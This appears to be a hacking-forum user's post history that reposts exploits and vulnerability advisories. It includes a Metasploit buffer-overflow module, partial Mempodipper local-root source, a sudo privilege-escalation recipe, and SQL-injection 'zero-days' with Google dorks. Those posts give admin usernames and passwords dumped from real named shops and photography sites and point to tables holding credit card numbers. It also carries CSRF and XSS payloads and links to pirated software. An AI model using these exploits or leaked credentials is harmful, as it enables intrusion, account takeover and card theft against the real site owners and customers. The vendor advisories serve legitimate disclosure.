-
Posts
425 -
Joined
-
Last visited
-
Days Won
2
Posts posted by The_Arhitect
-
-
sudo 1.8.0 - 1.8.3p1 Format String Vulnerability
Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +--++>
[ Authors ]
joernchen <joernchen () phenoelit de>
Phenoelit Group (http://www.phenoelit.de)
[ Affected Products ]
sudo 1.8.0 - 1.8.3p1 (http://sudo.ws)
[ Vendor communication ]
2012-01-24 Send vulnerability details to sudo maintainer
2012-01-24 Maintainer is embarrased
2012-01-27 Asking maintainer how the fixing goes
2012-01-27 Maintainer responds with a patch and a release date
of 2012-01-30 for the patched sudo and advisory
2012-01-30 Release of this advisory
[ Description ]
Observe src/sudo.c:
void
sudo_debug(int level, const char *fmt, ...)
{
va_list ap;
char *fmt2;
if (level > debug_level)
return;
/* Backet fmt with program name and a newline to make it a single
write */
easprintf(&fmt2, "%s: %s\n", getprogname(), fmt);
va_start(ap, fmt);
vfprintf(stderr, fmt2, ap);
va_end(ap);
efree(fmt2);
}
Here getprogname() is argv[0] and by this user controlled. So
argv[0] goes to fmt2 which then gets vfprintf()ed to stderr. The
result is a Format String vulnerability.
[ Example ]
/tmp $ ln -s /usr/bin/sudo %n
/tmp $ ./%n -D9
*** %n in writable segment detected ***
Aborted
/tmp $
A note regarding exploitability: The above example shows the result
of FORTIFY_SOURCE which makes explotitation painful but not
impossible (see [0]). Without FORTIFY_SOURCE the exploit is straight
forward:
1. Use formatstring to overwrite the setuid() call with setgid()
2. Trigger with formatstring -D9
3. Make use of SUDO_ASKPASS and have shellcode in askpass script
4. As askpass will be called after the formatstring has
overwritten setuid() the askepass script will run with uid 0
5. Enjoy the rootshell
[ Solution ]
Update to version 1.8.3.p2
[ References ]
[0] http://www.phrack.org/issues.html?issue=67&id=9
[ end of file ] -
phpShowtime Directory Traversal
#
# Title : phpShowtime Directory Travel
# Author : Red Security TEAM
# Date : 31/01/2012
# Download : http://phpshowtime.kybernetika.de/
# Demo : http://phpshowtime.kybernetika.de/demo/
# Tested On : CentOS
# Dork : Copyright ©2005-2011 by Nova CMS.
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM
# Home : http://RedSecurity.COM
#
# Exploit :
#
# http://server/index.php?r=i/[Your Directory]
# Example : http://server/index.php?r=i/../../
# -
Felicitari!
-
Ce tip de hash este acesta?Un pm si mie chiar sunt curios de metoda .
There is nothing.
-
Free Music
-Option to search for entire albums OR songs (search, then tabs will become available)
-Pulls music from three more file sharing sites (and removed [removed])
-Added search example
-Entirely ad free
-More coming soon
Download music for free now at MosesMusic.net - Music Search Engine
-
-
#1 YouTube Software On The Internet
TUBESPY
The #1 YouTube Software On The Internet
Tubespy Allows You to Expertly Tap Into One of the Biggest Sources of Targeted Traffic On the Internet...And It Lets You Do it TODAY!
Introducing....Tubespy
We all know Youtube is the largest video website around today and it's indeed a huge cash cow to grow your business and to flood your Clickbank accounts with cash. The only problem is, most of you have no idea how to effectively get your links displayed.
And what is worse is those of you who do know that it can takes hours and hours of research.
NOT ANY MORE!!!
Watch this video for a live demo of how Tubespy works!
Salespage:
http://www.warriorforum.com/warrior-special-offers-forum/422346-re-warrior-special-offer-week-2700-sold-1-youtube-software-internet-rave-reviews.html
Download:
http://www.filesonic.it/file/1570962221/TubeSpy.zip
http://www.mediafire.com/?rz3hjl5lmnd3dby -
0Day Exploit 1 - Shopping Cart.
# Exploit Title: CF Shopkart Shopping Site Engine [MSAcess&MYSQL SQL Injection] 0day
# Date: 12/1/12
# Author: Srblche
# Vendor or Software Link: http://www.webstoresltd.com/webstores.cfm and www.cfshopkart.com/
# Version: v4.x.x - v5.x.x
# Category:: Webapps
# Google dork: inurl:.cfm?Action=ViewDetails + "Website Content for"
# Tested on: Windows 7 and Backtrack
## 18,600 results
## EXPLOIT: http://www.streetsourceleds.com/index.cfm?action=ViewDetails&ItemID=50&Category=1 [SQLi HERE]
Vuln Link: http://www.streetsourceleds.com/index.cfm?action=ViewDetails&ItemID=50&Category=29
In Depth Analysis: Most CF ShopKart scripts runs either MSAccess or MYSQLv5 databases. However we can get through both. The admin directory is always located at /admin/
This 0day was made for Srblche.
---------------------
TABLE [orders] CONTAINS CREDIT CARD NUMBERS, EXPIRY and SECURITY CODES
TABLE [users] CONTAINS ADMIN INFO
ADMIN PANEL LINK WILL ALWAYS BE AT [/admin]
---------------------
MSACCESS HELP - [+]
Table Names of CF ShopKart --
categories
checkoutheader
companyinfo
contacts
customerhistory
discounts
emaillist
gallery
gallerycats
gallerycomments
gallerynotes
graphics
help
homepage
imagecategories
ipcountries
links
logins
options
order\_no
orderdetails
orders --------------------------->> CreditCardType,CreditCardNumber,CreditCardExpire,CCConfirmationNumber
pages
products
promos
sales
sellingareas
sentmessages
settings
settings2
shippingsurcharges
shippingtable1
shippingtable2
shippingtable3
shippingtable4
shippingtable5
shippingtypes
shoppingcarts
stats
stats\_archive
storeheader
taxes
temporders
upsconfig
users ---------------------------------->> UserID,UserName,Password,UserLevel
wishlistitems
wishlists
--------------------------------------------------------------------------------
https://www.streetsourceleds.com/(secure)/admin//admin.cfm
Data Found: UserID,UserName,Password,UserLevel=20^admin^incentives^Admin
Data Found: UserID,UserName,Password,UserLevel=22^stalerico^kazoo^Admin
CVV's in only some orders.
--------------------------------------------------------------------------------
https://www.zijagear.com/shop/admin/admin.cfm
admin:taylor12
(paypal shop, no cc's found unless setting changed in options to store cc details)
--------------------------------------------------------------------------------
EDIT NEW DORK : intext:"Powered by CFShopKart" 1 MORE DORK: inurl:/index.cfm?carttoken=
(About 317,000 results (0.37 seconds) http://www.ktlcc.com/handwsportshop.com/shop/admin
admin:taylor12
=============================================================
http://www.augersidekick.com
Column Data: admin
Data Found: username=admin
Length of 'Column Data' is 10
Column Data: chrisnmarc
Data Found: password=chrisnmarc- 2
-
E-3 Design Shopping Cart 0Day Exploit.
Shopping cart exploit.
MsAccess Blind.
Dorks:
intext:"Website by e-3 Design."
inurl:"/portfolio/content.cfm?pageType="
inurl:"content.cfm?pageType=" intitle:"portfolio"
----------------------------
http://www.oceanartshawaii.com/content.cfm?pageID=15
Data Found: password=jeHni81F
Data Found: username=lardav
Data Found: password=75oceana11
Data Found: username=glenn
http://www.oceanartshawaii.com/administration/
--------------------------------------------
http://www.nicolerubio.com/content.cfm?pageID=35
Data Found: username=lardav
Data Found: password=jeHni81F
Data Found: username=nicole
Data Found: password=ag81Ln3
Data Found: username=nicole
Data Found: password=ag81Ln3
Data Found: username=nicole
-------------
http://www.lisawalshphotography.com/content.cfm?pageID=31
Data Found: username=lardav
Data Found: password=jeHni81F
Data Found: username=lisa
Data Found: password=jeHni81F
http://www.lisawalshphotography.com/administration/
--------------------------------------------------
http://brianzeglis.com/content.cfm?pageID=2
Data Found: username=lardav
Data Found: password=jeHni81F
Data Found: username=brian
Data Found: password=b22zeg9
http://brianzeglis.com/administration/
--------------------------------------------------
http://www.stevesullyphoto.com/content.cfm?pageID=39 -
- 1
-
Si-au gasit si astia nasu
-
HP Diagnostics Server magentservice.exe Overflow
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Diagnostics Server magentservice.exe overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP Diagnostics Server
magentservice.exe service. By sending a specially crafted packet, an attacker
may be able to execute arbitrary code. Originally found and posted by
AbdulAziz Harir via ZDI.
},
'Author' =>
[
'AbdulAziz Hariri', # Original discovery
'hal', # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['OSVDB', '72815'],
['CVE', '2011-4789'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-016/']
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
'SSL' => true,
'SSLVersion' => 'SSL3'
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'DefaultTarget' => 0,
'Targets' =>
[
[
'Diagnostics Server 9.10',
{
# pop esi # pop ebx # ret 10
# magentservice.exe
'Ret' => 0x780c8f1f
}
]
],
'DisclosureDate' => 'Jan 12 2012'))
register_options([Opt::RPORT(23472)], self.class)
end
def exploit
req = "\x00\x00\x00\x00"
req << rand_text_alpha_upper(1092)
req << generate_seh_payload(target.ret)
connect
sock.put(req)
handler
disconnect
end
end -
Dublicate Product Code
-
Stoneware WebNetwork6 Multiple Vulnerabilities
Stoneware WebNetwork6 Vulnerability Assessment
* CVE-2012-0285 – XSS
* CVE-2012-0286 - CSRF
Conducted by:
* Leland Public Schools (Stoneware Customer)
* Jacob Holcomb (Network Engineer for LPS)
Conducted for:
* Leland Public Schools (Purchaser of WebNetwork product. Test was to assure cloud security)
* Stoneware INC. (Discovered Zero Day vulnerabilities reported to support in 11/2011 & 12/2011)
Date(s) Conducted:
* 11/2011 – Started initial Web application penetration testing
* 12/29/2011 – Started testing of Stoneware’s beta SP8 patch to resolve zero day vulnerabilities
- Executive Summary
The following reports details the findings from the security assessment performed by Jacob Holcomb of Leland Public Schools for the clients listed in the “Conducted for” heading.
-Web Vulnerability Assessment-
Deficiencies Noted
The following findings were discovered, noted, and reported during the web application assessment.
* WebNetwork6:
o Six stored Cross Site Scripting (XSS) Zero Day vulnerabilities discovered in the WebNetwork6 product.
o One Cross Site Request Forgery (CSRF) Zero Day vulnerabilities discovered in the WebNetwork6 product.
Overall Summary
The web application penetration test uncovered several deficiencies in the security structure of the WebNetwork6 private/hybrid cloud solution.
- Findings and Recommendations
The following Zero Day findings were discovered and disclosed through manual testing and were not disclosed by an automated web application security scanner (Such as Nessus, Acunetix, etc).
Recommendations to correct the issues are based off of web development best practices according to OWASP (Open Web Application Security Project) and do not reflect the changes implemented by Stoneware INC. to address the security concerns in the WebNetwork6 product outlined in this document.
Please see the section titled “Vendors solution to the problem” for a full comprehensive list of the actions taken to resolve the reported issues.
-WebNetwork6 Vulnerability Findings-
* XSS threats found. Input supplied by the user is not properly validated and sanitized by the Web Server application code prior to submitting the data for processing in multiple parts of the WebNetwork6 application.
o This flaw in business programming logic allows malicious users to use the Cross Site Scripting attack vector to submit and store executable code on the server hosting WebNetwork that will be executed in a users browser.
o XSS flaws occur when an application includes user-supplied input in a webpage that is sent to the browser without first properly validating or escaping (Sanitizing) that content.
o Cross Site Scripting allows an attacker to execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert hostile content, redirect users, etc.
* CSRF threat found. Requests sent to the Web Server application do not contain any sort of unique identifier that is tied to the users session.
o This flaw in business programming logic allows malicious users to use the Cross Site Request Forgery attack vector to submit a falsified HTTP request to the server and initiate a state change of user data/information on the server.
o Cross Site Request Forgery (CSRF) takes advantage of a web applications logic and allows attackers to predict all the details of a particular action. Browsers send session ID’s (cookies) for the requested website automatically when requesting that site, so an attacker can create a malicious web page, HTML post, or e-mail which then generates a forged request indistinguishable from the legitimate request and gets submitted to the server for processing.
o Malicious hackers can cause victims (Administrator or lesser privileged users) to change any data the victim is allowed to change or perform any action the victim is authorized to use. The user must be logged in for this attack to work.
o The CSRF can be exploited via the XSS attack vector as well using HTML GET request versus HTML POST request.
-Common Vulnerabilities and Exposure (CVE)-
The Common Vulnerabilities and Exposures (CVE) project has assigned the following CVE’s to the issues outlined in this web application penetration test report.
* CVE-2012-0285 – XSS
* CVE-2012-0286 - CSRF
-WebNetwork6 Vulnerability Solutions-
* XSS
o All untrusted data (user data) should be properly escaped (Sanitized) based on the HTML context that the data is going to be placed into.
o Validate ALL input. If input is encoded, decode it, and then validate the length, type, characters, and format of the data being passed as input.
* CSRF
o To prevent CSRF the web server application should include an unpredictable synchronizer token that is unique for each HTTP request made or per user session.
o The preferred option is to include the unique token in a hidden field. This will never reveal the value in the URL and is put into the body of the HTTP request being sent to the server for processing
o The synchronizer token can also be placed in the URL itself as a URL parameter. Doing so is not recommended as it divulges this information to an attacker.
CSRF Exploitation:
In the following example we use CSRF to forge a HTTP POST request that will update or configure a users alternate e-mail, password reset questions, and password reset question answers. The user must be logged in for CSRF to work.
Exploited URL: https://NameOfServer/apps/selfService/resetPasswordOptions.jsp
HTML code for forged POST request:
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'>
<html lang="en">
<head>
<title>CSRF(POST):BY Jacob Holcomb</title>
</head>
<body>
<form action="https://SERVERNAME/apps/selfService/resetPasswordOptions.jsp" id="formid" method="post">
<input type="hidden" name="submitted" value="submit" />
<input type="hidden" name="isSimpleResetEnabled" value="false" />
<input type="hidden" name="m_question1" value="What is your mother's maiden name?" />
<input type="hidden" name="m_answer1" value="null" />
<input type="hidden" name="h_answer1" value="null" />
<input type="hidden" name="m_question2" value="What is the city you were born in?" />
<input type="hidden" name="m_answer2" value="null" />
<input type="hidden" name="h_answer2" value="null" />
<input type="hidden" name="altemail" value="enteremail@here.com" />
</form>
<script>
document.getElementById('formid').submit();
</script>
</body>
</html>
XSS Exploitation:
In the following example we use HTML tags to embed malicious code on the server hosting the WebNetwork6 application. This task is accomplished by inputting tagged HTML code in fields that accept user input. I will provide a few code snippets that were used in testing which you can find below along with the vulnerable JavaScript script that allows us to embed the arbitrary code through out the WebNetwork6 product.
The affected locations of the webNetwork6 product susceptible to XSS are the “My Blog”, “TeamPages”, and “News and Articles” features. Each of these sections allows us to post content to the following JavaScript (Body of the post), which does not sanitize user input. The subject line (Post title) is also susceptible to persistent XSS. Two attacks possible per WebNetwork6 feature.
Exploited URL (Input Field): https://NameOfServer/swDashboard/pEdit/pinEditor.jsp?id=oPinEditor&crossdomain=false&autoFocus=false&new=true
GET /swDashboard/pEdit/pinEditor.jsp?id=oPinEditor&crossdomain=false&autoFocus=false&new=true HTTP/1.1
Host: host.domainname.com
User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Referer: https://hostname/community/blog.jsp?blogName=personal
Cookie: SWARESESSIONID=COOKIE VALUE HERE; SWARESESSIONID=COOKIE VALUE HERE; CStoneSessionID=freire-COOKIE VALUE HERE
Connection: keep-alive
*The URL listed above in the HTML GET request is a JavaScript text editor that does not properly validate/sanitize user input.
XSS Code snippets:
* <script>alert(‘XSS Test’)</script>
* <script>alert(document.cookie)</script>
* <imgsrc="https://ServerNameHere/apps/selfService/resetPasswordOptions.jsp?submitted=submit&isSimpleResetEnabled=false&m_question1=What%20is%20your%20mother's%20maiden%20name%3F&m_answer1=For%20security%20purposes%2C%20your%20saved%20answers%20are%20not%20being%20displayed.&h_answer1=9xxxxxxxxxxxd0e3&m_question2=What%20is%20the%20city%20you%20were%20born%20in%3F&m_answer2=For%20security%20purposes%2C%20your%20saved%20answers%20are%20not%20being%20displayed.&h_answer2=9xxxxxxxxxxxd0e3&altemail=xxx%40xxx.com" />
o The imgsrc HTML tag above allows us to submit a GET request to the server and perform our CSRF attack using a XSS attack vector to submit the falsified request.
Compromise
* The CSRF reported allows for a breach in directory service user accounts, which can lead to a compromise of the entire web application configuration, server hosting the web application, and potentially other servers, end nodes, and domain services on the domain network.
* The six stored (persistent) XSS reported allows for information disclosure and arbitrary code execution that can lead to the compromise of a users account, machine, or other sensitive information.
- Vendors Solution to the problem
Stoneware has published a security bulletin on the issues outlined in this report. You can find the contents of the bulletin at http://www.stone-ware.com/swql.jsp?kb=d1960
An e-mail advisory was also made available to Stoneware customers, which you can find below.
Resolution
* Cross-Site Request Forgery - CSRF issues were addressed by inclusion of a required, session-limited security token.
* Cross-Site Scripting - XSS issues were addressed by escaping (Sanitizing) the untrusted input data.
Stoneware Security Bulletin
January 20, 2012
Summary
This security bulletin is provided to notify customers of two security vulnerabilities with the webNetwork product. Stoneware has released webNetwork 6.0 Service Pack 8 to address these issues. The vulnerabilities could allow for unintended information disclosure and breach of user accounts. The impact of exploitation of these vulnerabilities depend on the sensitivity of the content contained within webNetwork.
Recommendation
Stoneware recommends that customers upgrade to webNetwork 6.0 Service Pack 8 at their earliest opportunity.
Acknowledgements
Stoneware would like to thank Jacob Holcomb of Leland Public Schools for reporting CVE-2012-0285 and CVE-2012-0286.
Disclaimer
The information provided by Stoneware in this bulletin and in the Stoneware Knowledge Base is provided "as is" without warranty of any kind. Stoneware disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Stoneware, Inc. or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Stoneware, Inc. or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
Revisions
1.0, 2012-January-20, Bulletin published. -
WordPress <= 3.3.1 Multiple Vulnerabilities
Trustwave's SpiderLabs Security Advisory TWSL2012-002:
Multiple Vulnerabilities in WordPress
https://www.trustwave.com/spiderlabs/advisories/TWSL2012-002.txt
Published: 1/24/12
Version: 1.0
Vendor: WordPress (http://wordpress.org/)
Product: WordPress
Version affected: 3.3.1 and prior
Product description:
WordPress is a free and open source blogging tool and publishing platform
powered by PHP and MySQL.
Credit: Jonathan Claudius of Trustwave SpiderLabs
Finding 1: PHP Code Execution and Persistent Cross Site Scripting
Vulnerabilities via 'setup-config.php' page.
CVE: CVE-2011-4899
The WordPress 'setup-config.php' installation page allows users to install
WordPress in local or remote MySQL databases. This typically requires a user
to have valid MySQL credentials to complete. However, a malicious user can
host their own MySQL database server and can successfully complete the
WordPress installation without having valid credentials on the target system.
After the successful installation of WordPress, a malicious user can inject
malicious PHP code via the WordPress Themes editor. In addition, with control
of the database store, malicious Javascript can be injected into the content
of WordPress yielding persistent Cross Site Scripting.
Proof of Concept:
Servers Involved
A.B.C.D = Target WordPress Web Server
W.X.Y.Z = Malicious User's MySQL Instance
1.) Malicious User hosts their own MySQL instance at W.X.Y.Z on port 3306
2.) Performs POST/GET Requests to Install WordPress into MySQL Instance
Request #1
----------
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
dbname=wordpress&uname=jsmith&pwd=jsmith&dbhost=W.X.Y.Z&prefix=wp_&submit=Submit
Request #2
----------
GET /wp-admin/install.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=2
Cookie: wp-settings-time-1=1322687480; wp-settings-1=m9%3Do
If-Modified-Since: Wed, 07 Dec 2011 16:03:33 GMT
3.) Get PHP Code Execution
Malicious user edits 404.php via Themes Editor as follows:
<?php
phpinfo();
?>
Note #1: Any php file in the theme could be used.
Note #2: Depending settings, PHP may be used to execute system commands
on webserver.
Malicious user performs get request of modified page to execute code.
Request
-------
GET /wp-content/themes/default/404.php HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
4.) Get Persistent Cross Site Scripting
Malicious User Injects Malicious Javascript into their own MySQL database instance
MySQL Query
-----------
update wp_comments SET
comment_content='<script>alert('123')</script>' where comment_content='Hi,
this is a comment.<br />To delete \ a comment, just log in and view the
post's comments. There you will have the option to edit or delete
them.';
Non-malicious User Visits Wordpress installation and has Javascript executed on their browser
Request
-------
GET /?p=1 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Finding 2: Multiple Cross Site Scripting Vulnerabilities in
'setup-config.php' page
CVE: CVE-2012-0782
The WordPress 'setup-config.php' installation page allows users to install
WordPress in local or remote MySQL databases. When using this installation page
the user is asked to supply the database name, the server that the database
resides on, and a valid MySQL username and password.
During this process, malicious users can supply javascript within
the "dbname", "dbhost" or "uname" parameters. Upon clicking the submission
button, the javascript is rendered in the client's browser.
Proof of Concept:
Servers Involved
A.B.C.D = Target WordPress Web Server
Request
-------
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
dbname=%3Cscript%3Ealert%28%27123%27%29%3C%2Fscript%3E&uname=root&pwd=&dbhost=localhost&prefix=wp_&submit=Submit
Finding 3: MySQL Server Username/Password Disclosure Vulnerability via
'setup-config.php' page
CVE: CVE-2011-4898
The WordPress 'setup-config.php' installation page allows users to install
WordPress in local or remote MySQL databases. When using this installation page
the user is asked to supply the database name, the server the database resides
on, and a valid MySQL username and password.
Malicious users can omit the "dbname" parameter during this process, allowing
them to continually bruteforce MySQL instance usernames and passwords. This
includes any local or remote MySQL instances which are accessible to the
target web server. This can also be used as a method to proxy MySQL bruteforce
attacks against other MySQL instances outside of the target organization.
Proof of Concept:
Servers Involved
A.B.C.D = Target WordPress Web Server
L.M.N.O = Any MySQL Server for which the Web Server has network access
Request
-------
POST /wp-admin/setup-config.php?step=2 HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D/wp-admin/setup-config.php?step=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
uname=mysql&pwd=mysql&dbhost=L.M.N.O
Response (If Password is Valid)
-------------------------------
<---snip-->
We were able to connect to the database server (which means your username
and password is okay) but not able to select the database.
<---snip-->
Response (If Password is Invalid)
---------------------------------
<---snip-->
This either means that the username and password information in your
wp-config.php file is incorrect or we can't contact the database server at
localhost. This could mean your host's database server is down.
<---snip-->
Vendor Response:
Due to the fact that the component in question is an installation script,
the vendor has stated that the attack surface is too small to warrant
a fix:
"We give priority to a better user experience at the install process. It is
unlikely a user would go to the trouble of installing a copy of WordPress
and then not finishing the setup process more-or-less immediately. The
window of opportunity for exploiting such a vulnerability is very small."
However, Trustwave SpiderLabs urges caution in situations where the
WordPress installation script is provided as part of a default image.
This is often done as a convenience on hosting providers, even in
cases where the client does not use the software. It is a best practice
to ensure that no installation scripts are exposed to outsiders, and
these vulnerabilities reinforce the importance of this step.
Remediation Steps:
No official fix for these issues will be released for the WordPress
publishing platform. However, administrators can mitigate these issues by
creating strong MySQL passwords and defining rules within a web application
firewall (WAF) solution. ModSecurity (http://www.modsecurity.org/) has
added rules to the commercial rules feed for these issues, and Trustwave's
vulnerability scanning solution, TrustKeeper, has been updated to detect
exposed installation scripts.
Vendor Communication Timeline:
12/22/11 - Vulnerability disclosed
01/16/12 - Confirmation to release vulnerabilities
01/24/12 - Advisory published
References
1. http://www.wordpress.org
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format. -
Daca faci cumparaturile alea, fale repede la mine la limitat in 2 ore.
-
Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit
Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
Blog post about it is here: http://blog.zx2c4.com/749
# Exploit Title: Mempodipper - Linux Local Root for >=2.6.39, 32-bit and 64-bit
# Date: Jan 21, 2012
# Author: zx2c4
# Tested on: Gentoo, Ubuntu
# Platform: Linux
# Category: Local
# CVE-2012-0056
/*
* Mempodipper
* by zx2c4
*
* Linux Local Root Exploit
*
* Rather than put my write up here, per usual, this time I've put it
* in a rather lengthy blog post: http://blog.zx2c4.com/749
*
* Enjoy.
*
* - zx2c4
* Jan 21, 2012
*
* CVE-2012-0056
*/
#define _LARGEFILE64_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <fcntl.h>
#include <unistd.h>
#include <limits.h>
char *socket_path = "/tmp/.sockpuppet";
int send_fd(int fd)
{
char buf[1];
struct iovec iov;
struct msghdr msg;
struct cmsghdr *cmsg;
struct sockaddr_un addr;
int n;
int sock;
char cms[CMSG_SPACE(sizeof(int))];
if ((sock = socket(AF_UNIX, SOCK_STREAM, 0)) < 0)
return -1;
memset(&addr, 0, sizeof(addr));
addr.sun_family = AF_UNIX;
strncpy(addr.sun_path, socket_path, sizeof(addr.sun_path) - 1);
if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) < 0)
return -1;
buf[0] = 0;
iov.iov_base = buf;
iov.iov_len = 1;
memset(&msg, 0, sizeof msg);
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = (caddr_t)cms;
msg.msg_controllen = CMSG_LEN(sizeof(int));
cmsg = CMSG_FIRSTHDR(&msg);
cmsg->cmsg_len = CMSG_LEN(sizeof(int));
cmsg->cmsg_level = SOL_SOCKET;
cmsg->cmsg_type = SCM_RIGHTS;
memmove(CMSG_DATA(cmsg), &fd, sizeof(int));
if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
return -1;
close(sock);
return 0;
}
int recv_fd()
{
int listener;
int sock;
int n;
int fd;
char buf[1];
struct iovec iov;
struct msghdr msg;
struct cmsghdr *cmsg;
struct sockaddr_un addr;
char cms[CMSG_SPACE(sizeof(int))];
if ((listener = socket(AF_UNIX, SOCK_STREAM, 0)) < 0)
return -1;
memset(&addr, 0, sizeof(addr));
addr.sun_family = AF_UNIX;
strncpy(addr.sun_path, socket_path, sizeof(addr.sun_path) - 1);
unlink(socket_path);
if (bind(listener, (struct sockaddr*)&addr, sizeof(addr)) < 0)
return -1;
if (listen(listener, 1) < 0)
return -1;
if ((sock = accept(listener, NULL, NULL)) < 0)
return -1;
iov.iov_base = buf;
iov.iov_len = 1;
memset(&msg, 0, sizeof msg);
msg.msg_name = 0;
msg.msg_namelen = 0;
msg.msg_iov = &iov;
msg.msg_iovlen = 1;
msg.msg_control = (caddr_t)cms;
msg.msg_controllen = sizeof cms;
if ((n = recvmsg(sock, &msg, 0)) < 0)
return -1;
if (n == 0)
return -1;
cmsg = CMSG_FIRSTHDR(&msg);
memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
close(sock);
close(listener);
return fd;
}
int main(int argc, char **argv)
{
if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') {
char parent_mem[256];
sprintf(parent_mem, "/proc/%s/mem", argv[2]);
printf("[+] Opening parent mem %s in child.\n", parent_mem);
int fd = open(parent_mem, O_RDWR);
if (fd < 0) {
perror("[-] open");
return 1;
}
printf("[+] Sending fd %d to parent.\n", fd);
send_fd(fd);
return 0;
}
printf("===============================\n");
printf("= Mempodipper =\n");
printf("= by zx2c4 =\n");
